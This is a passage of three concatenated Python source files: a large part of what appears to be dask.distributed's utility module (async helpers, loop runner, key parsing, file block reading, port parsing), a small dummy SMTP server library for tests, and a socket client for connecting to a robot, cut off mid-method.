err. See https://github.com/tornadoweb/tornado/issues/1546 Parameters ---------- args: futures to wait for quiet_exceptions: tuple, Exception Exception types to avoid logging if they fail """ tasks = gen.WaitIterator(*map(asyncio.ensure_future, args)) results = [None for _ in args] while not tasks.done(): try: result = await tasks.next() except Exception: @gen.coroutine def quiet(): """ Watch unfinished tasks Otherwise if they err they get logged in a way that is hard to control. They need some other task to watch them so that they are not orphaned """ for task in list(tasks._unfinished): try: yield task except quiet_exceptions: pass quiet() raise results[tasks.current_index] = result return results async def Any(args, quiet_exceptions=()): """ Wait on many tasks at the same time and return when any is finished Err once any of the tasks err. Parameters ---------- args: futures to wait for quiet_exceptions: tuple, Exception Exception types to avoid logging if they fail """ tasks = gen.WaitIterator(*map(asyncio.ensure_future, args)) results = [None for _ in args] while not tasks.done(): try: result = await tasks.next() except Exception: @gen.coroutine def quiet(): """ Watch unfinished tasks Otherwise if they err they get logged in a way that is hard to control. They need some other task to watch them so that they are not orphaned """ for task in list(tasks._unfinished): try: yield task except quiet_exceptions: pass quiet() raise results[tasks.current_index] = result break return results def sync(loop, func, *args, callback_timeout=None, **kwargs): """ Run coroutine in loop running in separate thread. """ # Tornado's PollIOLoop doesn't raise when using closed, do it ourselves if PollIOLoop and ( (isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False)) or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed) ): raise RuntimeError("IOLoop is closed") try: if loop.asyncio_loop.is_closed(): # tornado 6 raise RuntimeError("IOLoop is closed") except AttributeError: pass e = threading.Event() main_tid = threading.get_ident() result = [None] error = [False] @gen.coroutine def f(): try: if main_tid == threading.get_ident(): raise RuntimeError("sync() called from thread of running loop") yield gen.moment thread_state.asynchronous = True future = func(*args, **kwargs) if callback_timeout is not None: future = asyncio.wait_for(future, callback_timeout) result[0] = yield future except Exception as exc: error[0] = sys.exc_info() finally: thread_state.asynchronous = False e.set() loop.add_callback(f) if callback_timeout is not None: if not e.wait(callback_timeout): raise TimeoutError("timed out after %s s." % (callback_timeout,)) else: while not e.is_set(): e.wait(10) if error[0]: typ, exc, tb = error[0] raise exc.with_traceback(tb) else: return result[0] class LoopRunner: """ A helper to start and stop an IO loop in a controlled way. Several loop runners can associate safely to the same IO loop. Parameters ---------- loop: IOLoop (optional) If given, this loop will be re-used, otherwise an appropriate one will be looked up or created. asynchronous: boolean (optional, default False) If false (the default), the loop is meant to run in a separate thread and will be started if necessary. If true, the loop is meant to run in the thread this object is instantiated from, and will not be started automatically. """ # All loops currently associated to loop runners _all_loops = weakref.WeakKeyDictionary() _lock = threading.Lock() def __init__(self, loop=None, asynchronous=False): current = IOLoop.current() if loop is None: if asynchronous: self._loop = current else: # We're expecting the loop to run in another thread, # avoid re-using this thread's assigned loop self._loop = IOLoop() self._should_close_loop = True else: self._loop = loop self._should_close_loop = False self._asynchronous = asynchronous self._loop_thread = None self._started = False with self._lock: self._all_loops.setdefault(self._loop, (0, None)) def start(self): """ Start the IO loop if required. The loop is run in a dedicated thread. If the loop is already running, this method does nothing. """ with self._lock: self._start_unlocked() def _start_unlocked(self): assert not self._started count, real_runner = self._all_loops[self._loop] if self._asynchronous or real_runner is not None or count > 0: self._all_loops[self._loop] = count + 1, real_runner self._started = True return assert self._loop_thread is None assert count == 0 loop_evt = threading.Event() done_evt = threading.Event() in_thread = [None] start_exc = [None] def loop_cb(): in_thread[0] = threading.current_thread() loop_evt.set() def run_loop(loop=self._loop): loop.add_callback(loop_cb) try: loop.start() except Exception as e: start_exc[0] = e finally: done_evt.set() thread = threading.Thread(target=run_loop, name="IO loop") thread.daemon = True thread.start() loop_evt.wait(timeout=10) self._started = True actual_thread = in_thread[0] if actual_thread is not thread: # Loop already running in other thread (user-launched) done_evt.wait(5) if not isinstance(start_exc[0], RuntimeError): if not isinstance( start_exc[0], Exception ): # track down infrequent error raise TypeError("not an exception", start_exc[0]) raise start_exc[0] self._all_loops[self._loop] = count + 1, None else: assert start_exc[0] is None, start_exc self._loop_thread = thread self._all_loops[self._loop] = count + 1, self def stop(self, timeout=10): """ Stop and close the loop if it was created by us. Otherwise, just mark this object "stopped". """ with self._lock: self._stop_unlocked(timeout) def _stop_unlocked(self, timeout): if not self._started: return self._started = False count, real_runner = self._all_loops[self._loop] if count > 1: self._all_loops[self._loop] = count - 1, real_runner else: assert count == 1 del self._all_loops[self._loop] if real_runner is not None: real_runner._real_stop(timeout) def _real_stop(self, timeout): assert self._loop_thread is not None if self._loop_thread is not None: try: self._loop.add_callback(self._loop.stop) self._loop_thread.join(timeout=timeout) with suppress(KeyError): # IOLoop can be missing self._loop.close() finally: self._loop_thread = None def is_started(self): """ Return True between start() and stop() calls, False otherwise. """ return self._started def run_sync(self, func, *args, **kwargs): """ Convenience helper: start the loop if needed, run sync(func, *args, **kwargs), then stop the loop again. """ if self._started: return sync(self.loop, func, *args, **kwargs) else: self.start() try: return sync(self.loop, func, *args, **kwargs) finally: self.stop() @property def loop(self): return self._loop @contextmanager def set_thread_state(**kwargs): old = {} for k in kwargs: try: old[k] = getattr(thread_state, k) except AttributeError: pass for k, v in kwargs.items(): setattr(thread_state, k, v) try: yield finally: for k in kwargs: try: v = old[k] except KeyError: delattr(thread_state, k) else: setattr(thread_state, k, v) @contextmanager def tmp_text(filename, text): fn = os.path.join(tempfile.gettempdir(), filename) with open(fn, "w") as f: f.write(text) try: yield fn finally: if os.path.exists(fn): os.remove(fn) def clear_queue(q): while not q.empty(): q.get_nowait() def is_kernel(): """ Determine if we're running within an IPython kernel >>> is_kernel() False """ # http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session if "IPython" not in sys.modules: # IPython hasn't been imported return False from IPython import get_ipython # check for `kernel` attribute on the IPython instance return getattr(get_ipython(), "kernel", None) is not None hex_pattern = re.compile("[a-f]+") @functools.lru_cache(100000) def key_split(s): """ >>> key_split('x') 'x' >>> key_split('x-1') 'x' >>> key_split('x-1-2-3') 'x' >>> key_split(('x-2', 1)) 'x' >>> key_split("('x-2', 1)") 'x' >>> key_split("('x', 1)") 'x' >>> key_split('hello-world-1') 'hello-world' >>> key_split(b'hello-world-1') 'hello-world' >>> key_split('ae05086432ca935f6eba409a8ecd4896') 'data' >>> key_split('<module.submodule.myclass object at 0xdaf372') 'myclass' >>> key_split(None) 'Other' >>> key_split('x-abcdefab') # ignores hex 'x' """ if type(s) is bytes: s = s.decode() if type(s) is tuple: s = s[0] try: words = s.split("-") if not words[0][0].isalpha(): result = words[0].split(",")[0].strip("'(\"") else: result = words[0] for word in words[1:]: if word.isalpha() and not ( len(word) == 8 and hex_pattern.match(word) is not None ): result += "-" + word else: break if len(result) == 32 and re.match(r"[a-f0-9]{32}", result): return "data" else: if result[0] == "<": result = result.strip("<>").split()[0].split(".")[-1] return result except Exception: return "Other" def key_split_group(x): """A more fine-grained version of key_split >>> key_split_group(('x-2', 1)) 'x-2' >>> key_split_group("('x-2', 1)") 'x-2' >>> key_split_group('ae05086432ca935f6eba409a8ecd4896') 'data' >>> key_split_group('<module.submodule.myclass object at 0xdaf372') 'myclass' >>> key_split_group('x') >>> key_split_group('x-1') """ typ = type(x) if typ is tuple: return x[0] elif typ is str: if x[0] == "(": return x.split(",", 1)[0].strip("()\"'") elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x): return "data" elif x[0] == "<": return x.strip("<>").split()[0].split(".")[-1] else: return key_split(x) elif typ is bytes: return key_split_group(x.decode()) else: return key_split(x) @contextmanager def log_errors(pdb=False): from .comm import CommClosedError try: yield except (CommClosedError, gen.Return): raise except Exception as e: try: logger.exception(e) except TypeError: # logger becomes None during process cleanup pass if pdb: import pdb pdb.set_trace() raise def silence_logging(level, root="distributed"): """ Change all StreamHandlers for the given logger to the given level """ if isinstance(level, str): level = getattr(logging, level.upper()) old = None logger = logging.getLogger(root) for handler in logger.handlers: if isinstance(handler, logging.StreamHandler): old = handler.level handler.setLevel(level) return old @toolz.memoize def ensure_ip(hostname): """ Ensure that address is an IP address Examples -------- >>> ensure_ip('localhost') '127.0.0.1' >>> ensure_ip('123.123.123.123') # pass through IP addresses '123.123.123.123' """ # Prefer IPv4 over IPv6, for compatibility families = [socket.AF_INET, socket.AF_INET6] for fam in families: try: results = socket.getaddrinfo( hostname, 1234, fam, socket.SOCK_STREAM # dummy port number ) except socket.gaierror as e: exc = e else: return results[0][4][0] raise exc tblib.pickling_support.install() def get_traceback(): exc_type, exc_value, exc_traceback = sys.exc_info() bad = [ os.path.join("distributed", "worker"), os.path.join("distributed", "scheduler"), os.path.join("tornado", "gen.py"), os.path.join("concurrent", "futures"), ] while exc_traceback and any( b in exc_traceback.tb_frame.f_code.co_filename for b in bad ): exc_traceback = exc_traceback.tb_next return exc_traceback def truncate_exception(e, n=10000): """ Truncate exception to be about a certain length """ if len(str(e)) > n: try: return type(e)("Long error message", str(e)[:n]) except Exception: return Exception("Long error message", type(e), str(e)[:n]) else: return e def tokey(o): """ Convert an object to a string. Examples -------- >>> tokey(b'x') b'x' >>> tokey('x') 'x' >>> tokey(1) '1' """ typ = type(o) if typ is str or typ is bytes: return o else: return str(o) def validate_key(k): """Validate a key as received on a stream. """ typ = type(k) if typ is not str and typ is not bytes: raise TypeError("Unexpected key type %s (value: %r)" % (typ, k)) def _maybe_complex(task): """ Possibly contains a nested task """ return ( istask(task) or type(task) is list and any(map(_maybe_complex, task)) or type(task) is dict and any(map(_maybe_complex, task.values())) ) def convert(task, dsk, extra_values): if type(task) is list: return [convert(v, dsk, extra_values) for v in task] if type(task) is dict: return {k: convert(v, dsk, extra_values) for k, v in task.items()} if istask(task): return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:]) try: if task in dsk or task in extra_values: return tokey(task) except TypeError: pass return task def str_graph(dsk, extra_values=()): return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()} def seek_delimiter(file, delimiter, blocksize): """ Seek current file to next byte after a delimiter bytestring This seeks the file to the next byte following the delimiter. It does not return anything. Use ``file.tell()`` to see location afterwards. Parameters ---------- file: a file delimiter: bytes a delimiter like ``b'\n'`` or message sentinel blocksize: int Number of bytes to read from the file at once. """ if file.tell() == 0: return last = b"" while True: current = file.read(blocksize) if not current: return full = last + current try: i = full.index(delimiter) file.seek(file.tell() - (len(full) - i) + len(delimiter)) return except ValueError: pass last = full[-len(delimiter) :] def read_block(f, offset, length, delimiter=None): """ Read a block of bytes from a file Parameters ---------- f: file File-like object supporting seek, read, tell, etc.. offset: int Byte offset to start read length: int Number of bytes to read delimiter: bytes (optional) Ensure reading starts and stops at delimiter bytestring If using the ``delimiter=`` keyword argument we ensure that the read starts and stops at delimiter boundaries that follow the locations ``offset`` and ``offset + length``. If ``offset`` is zero then we start at zero. The bytestring returned WILL include the terminating delimiter string. Examples -------- >>> from io import BytesIO # doctest: +SKIP >>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP >>> read_block(f, 0, 13) # doctest: +SKIP b'Alice, 100\\nBo' >>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP b'Alice, 100\\nBob, 200\\n' >>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP b'Bob, 200\\nCharlie, 300' """ if delimiter: f.seek(offset) seek_delimiter(f, delimiter, 2 ** 16) start = f.tell() length -= start - offset f.seek(start + length) seek_delimiter(f, delimiter, 2 ** 16) end = f.tell() offset = start length = end - start f.seek(offset) bytes = f.read(length) return bytes @contextmanager def tmpfile(extension=""): extension = "." + extension.lstrip(".") handle, filename = tempfile.mkstemp(extension) os.close(handle) os.remove(filename) yield filename if os.path.exists(filename): try: if os.path.isdir(filename): shutil.rmtree(filename) else: os.remove(filename) except OSError: # sometimes we can't remove a generated temp file pass def ensure_bytes(s): """Attempt to turn `s` into bytes. Parameters ---------- s : Any The object to be converted. Will correctly handled * str * bytes * objects implementing the buffer protocol (memoryview, ndarray, etc.) Returns ------- b : bytes Raises ------ TypeError When `s` cannot be converted Examples -------- >>> ensure_bytes('123') b'123' >>> ensure_bytes(b'123') b'123' """ if isinstance(s, bytes): return s elif hasattr(s, "encode"): return s.encode() else: try: return bytes(s) except Exception as e: raise TypeError( "Object %s is neither a bytes object nor has an encode method" % s ) from e def divide_n_among_bins(n, bins): """ >>> divide_n_among_bins(12, [1, 1]) [6, 6] >>> divide_n_among_bins(12, [1, 2]) [4, 8] >>> divide_n_among_bins(12, [1, 2, 1]) [3, 6, 3] >>> divide_n_among_bins(11, [1, 2, 1]) [2, 6, 3] >>> divide_n_among_bins(11, [.1, .2, .1]) [2, 6, 3] """ total = sum(bins) acc = 0.0 out = [] for b in bins: now = n / total * b + acc now, acc = divmod(now, 1) out.append(int(now)) return out def mean(seq): seq = list(seq) return sum(seq) / len(seq) if hasattr(sys, "is_finalizing"): def shutting_down(is_finalizing=sys.is_finalizing): return is_finalizing() else: _shutting_down = [False] def _at_shutdown(l=_shutting_down): l[0] = True def shutting_down(l=_shutting_down): return l[0] atexit.register(_at_shutdown) shutting_down.__doc__ = """ Whether the interpreter is currently shutting down. For use in finalizers, __del__ methods, and similar; it is advised to early bind this function rather than look it up when calling it, since at shutdown module globals may be cleared. """ def open_port(host=""): """ Return a probably-open port There is a chance that this port will be taken by the operating system soon after returning from this function. """ # http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, 0)) s.listen(1) port = s.getsockname()[1] s.close() return port def import_file(path): """ Loads modules for a file (.py, .zip, .egg) """ directory, filename = os.path.split(path) name, ext = os.path.splitext(filename) names_to_import = [] tmp_python_path = None if ext in (".py",): # , '.pyc'): if directory not in sys.path: tmp_python_path = directory names_to_import.append(name) if ext == ".py": # Ensure that no pyc file will be reused cache_file = cache_from_source(path) with suppress(OSError): os.remove(cache_file) if ext in (".egg", ".zip", ".pyz"): if path not in sys.path: sys.path.insert(0, path) names = (mod_info.name for mod_info in pkgutil.iter_modules([path])) names_to_import.extend(names) loaded = [] if not names_to_import: logger.warning("Found nothing to import from %s", filename) else: importlib.invalidate_caches() if tmp_python_path is not None: sys.path.insert(0, tmp_python_path) try: for name in names_to_import: logger.info("Reload module %s from %s file", name, ext) loaded.append(importlib.reload(importlib.import_module(name))) finally: if tmp_python_path is not None: sys.path.remove(tmp_python_path) return loaded class itemgetter: """A picklable itemgetter. Examples -------- >>> data = [0, 1, 2] >>> get_1 = itemgetter(1) >>> get_1(data) 1 """ __slots__ = ("index",) def __init__(self, index): self.index = index def __call__(self, x): return x[self.index] def __reduce__(self): return (itemgetter, (self.index,)) def asciitable(columns, rows): """Formats an ascii table for given columns and rows. Parameters ---------- columns : list The column names rows : list of tuples The rows in the table. Each tuple must be the same length as ``columns``. """ rows = [tuple(str(i) for i in r) for r in rows] columns = tuple(str(i) for i in columns) widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns)) row_template = ("|" + (" %%-%ds |" * len(columns))) % widths header = row_template % tuple(columns) bar = "+%s+" % "+".join("-" * (w + 2) for w in widths) data = "\n".join(row_template % r for r in rows) return "\n".join([bar, header, bar, data, bar]) def nbytes(frame, _bytes_like=(bytes, bytearray)): """ Number of bytes of a frame or memoryview """ if isinstance(frame, _bytes_like): return len(frame) else: try: return frame.nbytes except AttributeError: return len(frame) @contextmanager def time_warn(duration, text): start = time() yield end = time() if end - start > duration: print("TIME WARNING", text, end - start) def json_load_robust(fn, load=json.load): """ Reads a JSON file from disk that may be being written as we read """ while not os.path.exists(fn): sleep(0.01) for i in range(10): try: with open(fn) as f: cfg = load(f) if cfg: return cfg except (ValueError, KeyError): # race with writing process pass sleep(0.1) class DequeHandler(logging.Handler): """ A logging.Handler that records records into a deque """ _instances = weakref.WeakSet() def __init__(self, *args, n=10000, **kwargs): self.deque = deque(maxlen=n) super(DequeHandler, self).__init__(*args, **kwargs) self._instances.add(self) def emit(self, record): self.deque.append(record) def clear(self): """ Clear internal storage. """ self.deque.clear() @classmethod def clear_all_instances(cls): """ Clear the internal storage of all live DequeHandlers. """ for inst in list(cls._instances): inst.clear() def reset_logger_locks(): """ Python 2's logger's locks don't survive a fork event https://github.com/dask/distributed/issues/1491 """ for name in logging.Logger.manager.loggerDict.keys(): for handler in logging.getLogger(name).handlers: handler.createLock() is_server_extension = False if "notebook" in sys.modules: import traitlets from notebook.notebookapp import NotebookApp is_server_extension = traitlets.config.Application.initialized() and isinstance( traitlets.config.Application.instance(), NotebookApp ) if not is_server_extension: is_kernel_and_no_running_loop = False if is_kernel(): try: get_running_loop() except RuntimeError: is_kernel_and_no_running_loop = True if not is_kernel_and_no_running_loop: # TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below, # once tornado > 6.0.3 is available. if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"): # WindowsProactorEventLoopPolicy is not compatible with tornado 6 # fallback to the pre-3.8 default of Selector # https://github.com/tornadoweb/tornado/issues/2608 BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy else: BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy class AnyThreadEventLoopPolicy(BaseEventLoopPolicy): def get_event_loop(self): try: return super().get_event_loop() except (RuntimeError, AssertionError): loop = self.new_event_loop() self.set_event_loop(loop) return loop asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy()) @functools.lru_cache(1000) def has_keyword(func, keyword): return keyword in inspect.signature(func).parameters @functools.lru_cache(1000) def command_has_keyword(cmd, k): if cmd is not None: if isinstance(cmd, str): try: from importlib import import_module cmd = import_module(cmd) except ImportError: raise ImportError("Module for command %s is not available" % cmd) if isinstance(getattr(cmd, "main"), click.core.Command): cmd = cmd.main if isinstance(cmd, click.core.Command): cmd_params = set( [ p.human_readable_name for p in cmd.params if isinstance(p, click.core.Option) ] ) return k in cmd_params return False # from bokeh.palettes import viridis # palette = viridis(18) palette = [ "#440154", "#471669", "#472A79", "#433C84", "#3C4D8A", "#355D8C", "#2E6C8E", "#287A8E", "#23898D", "#1E978A", "#20A585", "#2EB27C", "#45BF6F", "#64CB5D", "#88D547", "#AFDC2E", "#D7E219", "#FDE724", ] @toolz.memoize def color_of(x, palette=palette): h = md5(str(x).encode()) n = int(h.hexdigest()[:8], 16) return palette[n % len(palette)] def iscoroutinefunction(f): return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f) @contextmanager def warn_on_duration(duration, msg): start = time() yield stop = time() if stop - start > parse_timedelta(duration): warnings.warn(msg, stacklevel=2) def typename(typ): """ Return name of type Examples -------- >>> from distributed import Scheduler >>> typename(Scheduler) 'distributed.scheduler.Scheduler' """ try: return typ.__module__ + "." + typ.__name__ except AttributeError: return str(typ) def format_dashboard_link(host, port): template = dask.config.get("distributed.dashboard.link") if dask.config.get("distributed.scheduler.dashboard.tls.cert"): scheme = "https" else: scheme = "http" return template.format( **toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port)) ) def parse_ports(port): """ Parse input port information into list of ports Parameters ---------- port : int, str, None Input port or ports. Can be an integer like 8787, a string for a single port like "8787", a string for a sequential range of ports like "8000:8200", or None. Returns ------- ports : list List of ports Examples -------- A single port can be specified using an integer: >>> parse_ports(8787) >>> [8787] or a string: >>> parse_ports("8787") >>> [8787] A sequential range of ports can be specified by a string which indicates the first and last ports which should be included in the sequence of ports: >>> parse_ports("8787:8790") >>> [8787, 8788, 8789, 8790] An input of ``None`` is also valid and can be used to indicate that no port has been specified: >>> parse_ports(None) >>> [None] """ if isinstance(port, str) and ":" not in port: port = int(port) if isinstance(port, (int, type(None))): ports = [port] else: port_start, port_stop = map(int, port.split(":")) if port_stop <= port_start: raise ValueError( "When specifying a range of ports like port_start:port_stop, " "port_stop must be greater than port_start, but got " f"port_start={port_start} and port_stop={port_stop}" ) ports = list(range(port_start, port_stop + 1)) return ports def is_coroutine_function(f): return asyncio.iscoroutinefunction(f) or gen.is_coroutine_function(f) class Log(str): """ A container for logs """ def _repr_html_(self): return "<pre><code>\n{log}\n</code></pre>".format( log=html.escape(self.rstrip()) ) class Logs(dict): """ A container for multiple logs """ def _repr_html_(self): summaries = [ "<details>\n" "<summary style='display:list-item'>{title}</summary>\n" "{log}\n" "</details>".format(title=title, log=log._repr_html_()) for title, log in sorted(self.items()) ] return "\n".join(summaries) def cli_keywords(d: dict, cls=None, cmd=None): """ Convert a kwargs dictionary into a list of CLI keywords Parameters ---------- d: dict The keywords to convert cls: callable The callable that consumes these terms to check them for validity cmd: string or object A string with the name of a module, or the module containing a click-generated command with a "main" function, or the function itself. It may be used to parse a module's custom arguments (i.e., arguments that are not part of Worker class), such as nprocs from dask-worker CLI or enable_nvlink from dask-cuda-worker CLI. Examples -------- >>> cli_keywords({"x": 123, "save_file": "foo.txt"}) ['--x', '123', '--save-file', 'foo.txt'] >>> from dask.distributed import Worker >>> cli_keywords({"x": 123}, Worker) Traceback (most recent call last): ... ValueError: Class distributed.worker.Worker does not support keyword x """ if cls or cmd: for k in d: if not has_keyword(cls, k) and not command_has_keyword(cmd, k): if cls and cmd: raise ValueError( "Neither class %s or module %s support keyword %s" % (typename(cls), typename(cmd), k) ) elif cls: raise ValueError( "Class %s does not support keyword %s" % (typename(cls), k) ) else: raise ValueError( "Module %s does not support keyword %s" % (typename(cmd), k) ) def convert_value(v): out = str(v) if " " in out and "'" not in out and '"' not in out: out = '"' + out + '"' return out return sum( [["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], [] ) def is_valid_xml(text): return xml.etree.ElementTree.fromstring(text) is not None try: _offload_executor = ThreadPoolExecutor( max_workers=1, thread_name_prefix="Dask-Offload" ) except TypeError: _offload_executor = ThreadPoolExecutor(max_workers=1) weakref.finalize(_offload_executor, _offload_executor.shutdown) def import_term(name: str): """ Return the fully qualified term Examples -------- >>> import_term("math.sin") <function math.sin(x, /)> """ try: module_name, attr_name = name.rsplit(".", 1) except ValueError: return importlib.import_module(name) module = importlib.import_module(module_name) return getattr(module, attr_name) async def offload(fn, *args, **kwargs): loop = asyncio.get_event_loop() return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs)) def serialize_for_cli(data): """ Serialize data into a string that can be passthrough cli Parameters ---------- data: json-serializable object The data to serialize Returns ------- serialized_data: str The serialized data as a string """ return base64.urlsafe_b64encode(json.dumps(data).encode()).decode() def deserialize_for_cli(data): """ De-serialize data into the original object Parameters ---------- data: str String serialied by serialize_for_cli() Returns ------- deserialized_data: obj The de-serialized data """ return json.loads(base64.urlsafe_b64decode(data.encode()).decode()) class EmptyContext: def __enter__(self): pass def __exit__(self, *args): pass async def __aenter__(self): pass async def __aexit__(self, *args): pass empty_context = EmptyContext() class LRU(UserDict): """ Limited size mapping, evicting the least recently looked-up key when full """ def __init__(self, maxsize): super().__init__() self.data = OrderedDict() self.maxsize = maxsize def __getitem__(self, key): value = super().__getitem__(key) self.data.move_to_end(key) return value def __setitem__(self, key, value): if len(self) >= self.maxsize: self.data.popitem(last=False) super().__setitem__(key, value) def clean_dashboard_address(addr, default_listen_ip=""): """ Examples -------- >>> clean_dashboard_address(8787) {'address': '', 'port': 8787} >>> clean_dashboard_address(":8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("8787") {'address': '', 'port': 8787} >>> clean_dashboard_address("foo:8787") {'address': 'foo', 'port': 8787} """ if default_listen_ip == "0.0.0.0": default_listen_ip = "" # for IPV6 try: addr = int(addr) except (TypeError, ValueError): pass if isinstance(addr, str): addr = addr.split(":") if isinstance(addr, (tuple, list)): if len(addr) == 2: host, port = (addr[0], int(addr[1])) elif len(addr) == 1: [host], port = addr, 0 else: raise ValueError(addr) elif isinstance(addr, int): host = default_listen_ip port = addr return {"address": host, "port": port}
smtpretty.py
"""An SMTP server library designed specifically for running test suites. Overview -------- SMTPretty makes it easy to start and stop a local dummy SMTP server from within a test suite, and perform tests and assertions on the sent emails. Usage is straightforward: import smtpretty smtpretty.enable(2525) call_my_test_code({'smtp_host': '127.0.0.1', 'smtp_port': 2525}) assert(len(smtpretty.messages) == 1) assert(smtpretty.last_message.mail_from == 'testfrom@example.com') assert(smtpretty.last_message.recipients == ['testto@example.com']) assert(smtpretty.last_message.body == 'test email') smtpretty.disable() You can also use a decorator to enable/disable automatically: import smtppretty @smtpretty.activate(2525) def test_something(): call_my_test_code({'smtp_host': '127.0.0.1', 'smtp_port': 2525}) assert(len(smtpretty.messages) == 1) assert(smtpretty.last_message.mail_from == 'testfrom@example.com') Caveats and other notes ----------------------- - SMTPretty runs an actual server. This means that in order to run it on port 25, you will need to run it as root. A better approach is to ensure your code can be configured to use an SMTP server on another port. Future versions of SMTPretty might use a different approach (by patching the socket module, as [HTTPretty](https://github.com/gabrielfalcao/HTTPretty) does, though there is no definite plans at the moment); - SMTPretty does not currently allow to test for email sending failures; - SMTPretty can only run one SMTP server instance at a time, which covers the vast majority of use cases, and allows for a straightforward API. smtpretty.messages ------------------ `smtpretty.messages` contains the list of all messages sent since smtpretty was last activated. Each message is an instance of a SMTPrettyEmail object, and has the following attributes: - mail_from : String containing the envelope originator - recipients: List of strings defining the envelope recipients - headers : Dictionary of (lower-cased) header to list of values - body : The message body of the first part of the email. This provided as convenience for testing simple messages - raw_message : String containing the message as received - message : An [email.message](https://docs.python.org/2/library/email.message.html) object representing the message. For convenience, `smtpretty.last_message` contains the last sent message. Acknowledgements ---------------- SMTPretty was inspired by this blog post: https://muffinresearch.co.uk/fake-smtp-server-with-python/ and while it does not use the same approach (it runs an actual server rather than patching sockets), the API was inspired by [HTTPretty](https://github.com/gabrielfalcao/HTTPretty) """ import smtpd import threading import asyncore from functools import wraps from email import message_from_string messages = [] last_message = None _server = None _thread = None def enable(port=25, bind='127.0.0.1'): """Enable SMTPretty by starting an SMTP server. Parameters ---------- bind : str IP address to bind to port : int Port to bind to """ global _server, _thread, messages if _server is not None: disable() messages = [] last_message = None _server = SMTPrettyServer((bind, port), None) # Thanks to http://stackoverflow.com/questions/14483195/how-to-handle-asyncore-within-a-class-in-python-without-blocking-anything _thread = threading.Thread(target=asyncore.loop, kwargs={'timeout':1}) _thread.start() def disable(): """Disables SMTPretty by stopping the SMTP server""" global _server, _thread if _server is not None: _server.close() _thread.join() _server = None _thread = None def activate(method_or_port=25, bind='127.0.0.1'): """Decorator to enable SMTPretty before entry, and disable it after leaving Note that this can be used as a simple decorator (@activate) or as a parametrized decorator (@activate(port=2525)) """ port = method_or_port def decorator(f): @wraps(f) def wrapper(*args, **kargs): enable(port, bind) try: return f(*args, **kargs) finally: disable() return wrapper # Check whether we were called as a decorator (@activate) or as a function # that returns a decorator (@activate(2525)) if callable(method_or_port): port = 25 return decorator(method_or_port) else: return decorator class SMTPrettyServer(smtpd.SMTPServer): """The SMTP server used to receive the sent messages""" def process_message(self, peer, mail_from, recipients, raw_message): global messages, last_message last_message = SMTPrettyEmail(mail_from, recipients, raw_message) messages.append(last_message) class SMTPrettyEmail(object): """This represents the emails received by SMTPretty Attributes ---------- mail_from : str The envelope originator recipients : list of str The envelope recipients headers : dict A dictionary of (lower-cased) headers to values body : str The message body of the first part of the email. This provided as convenience for testing simple messages raw_message : str The raw message body message : email.message The email message parsed as an email.message object Parameters ---------- message : str The raw email body """ def __init__(self, mail_from, recipients, raw_message): self.mail_from = mail_from self.recipients = recipients self.raw_message = raw_message self.message = message_from_string(self.raw_message) self.headers = dict([(k.lower(), v) for (k, v) in self.message.items()]) self.body = self._get_body(self.message) def _get_body(self, message): if message.is_multipart(): p = message.get_payload() if len(p) > 0: return p[0].get_payload() else: return '' else: return message.get_payload()
robot_connection.py
#! python3 import socket import threading import select import queue class RobotConnection(object): """ Create a RobotConnection object with a given robot ip. """ VIDEO_PORT = 40921 AUDIO_PORT = 40922 CTRL_PORT = 40923 PUSH_PORT = 40924 EVENT_PORT = 40925 IP_PORT = 40926 def __init__(self, robot_ip=''): self.robot_ip = robot_ip self.video_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.audio_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.ctrl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.push_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.event_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.ip_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.push_socket.bind(('', RobotConnection.PUSH_PORT)) self.ip_socket.bind(('', RobotConnection.IP_PORT)) self.cmd_socket_list = [self.ctrl_socket, self.push_socket, self.event_socket] self.cmd_socket_msg_queue = { self.video_socket: queue.Queue(32), self.audio_socket: queue.Queue(32), self.ctrl_socket: queue.Queue(16), self.push_socket: queue.Queue(16), self.event_socket: queue.Queue(16) } self.cmd_socket_recv_thread = threading.Thread(target=self.__socket_recv_task) self.is_shutdown = True def update_robot_ip(self, robot_ip): """ Update the robot ip """ self.robot_ip = robot_ip def get_robot_ip(self, timeout=None): """ Get the robot ip from ip broadcat port If optional arg 'timeout' is None (the default), block if necessary until get robot ip from broadcast port. If 'timeout' is a non-negative number, it blocks at most 'timeout' seconds and return None if no data back from robot broadcast port within the time. Otherwise, return the robot ip immediately. """ self.ip_socket.settimeout(timeout) msg = None try: msg, addr = self.ip_socket.recvfrom(1024) except Exception as e: print('Get robot ip failed, please check the robot networking-mode and connection !') else: msg = msg.decode('utf-8') msg = msg[msg.find('robot ip ') + len('robot ip ') : ] return msg def open(self): """ Open the connection It will connect the control port and event port with TCP and start a data receive thread. """ self.ctrl_socket.settimeout(5) try: self.ctrl_socket.connect((self.robot_ip, RobotConnection.CTRL_PORT)) self.event_socket.connect((self.robot_ip, RobotConnection.EVENT_PORT)) except Exception as e: print('Connection failed, the reason is %s'%e) return False else: self.is_shutdown 